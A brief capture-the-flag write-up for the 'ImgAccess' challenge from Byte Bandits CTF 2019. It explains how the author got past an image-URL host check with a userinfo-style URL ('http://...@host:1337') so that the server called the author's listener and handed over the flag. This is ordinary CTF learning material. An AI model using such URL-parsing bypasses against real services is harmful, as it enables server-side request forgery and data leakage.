Saturday, April 13, 2019

Byte Bandits CTF 2019 - ImgAccess

by Elber "f0lds" Tavares

Description:

n00b created a super secure website for sharing images.

Do you think you can hack it?

http://imgaccess.ctf.euristica.in

chall

Write-up

When looking at the index, we quickly noticed the uploader and input Enter image URL.

Usually I think so I should get some XSS, send the link to the admin and get some cookie.

I got an alert on the client side with a .svg file, but I did not get any results.

I sent my host fireshellsecurity.team who was listening on port 1337, but I received the following message.

error

Apparently and could only send files that were on the link http://imgaccess.ctf.euristica.in/.

So I decided to try something better, I sent the http://[email protected]:1337 payload, I saw my host where I was listening on port 1337, and there was the flag.

flag

I think the resolution involves some other bypass, maybe with htaccess, some time later, the bypass was not working anymore.

Capture the Flag , Writeup , Web , Server Side Request Forgery